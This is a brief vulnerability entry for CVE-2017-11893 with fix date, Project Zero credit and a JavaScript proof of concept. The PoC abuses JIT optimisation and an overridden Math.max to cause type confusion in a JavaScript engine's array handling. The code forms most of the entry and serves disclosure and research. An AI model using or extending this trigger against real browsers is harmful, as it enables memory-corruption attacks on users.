CVE-2017-11893.md

CVE-2017-11893

• Fix: Jan 2018
• Credit: lokihardt of Google Project Zero

PoC

function opt(arr, arr2) {
    arr[0] = 1.1;
    Math.max.apply(Math, arr2);
    arr[0] = 2.3023e-320;
}

function main() {
    let arr = [1.1, 2.2, 3.3, 4.4];
    for (let i = 0; i < 10000; i++) {
        opt(arr, [1, 2, 3, 4]);
    }

    Math.max = function () {
        arr[0] = {};
    };

    opt(arr, {});  // can't handle, calls Math.max
    print(arr[0]);
}

main();

Reference

• Microsoft
• Google Project Zero
• Fix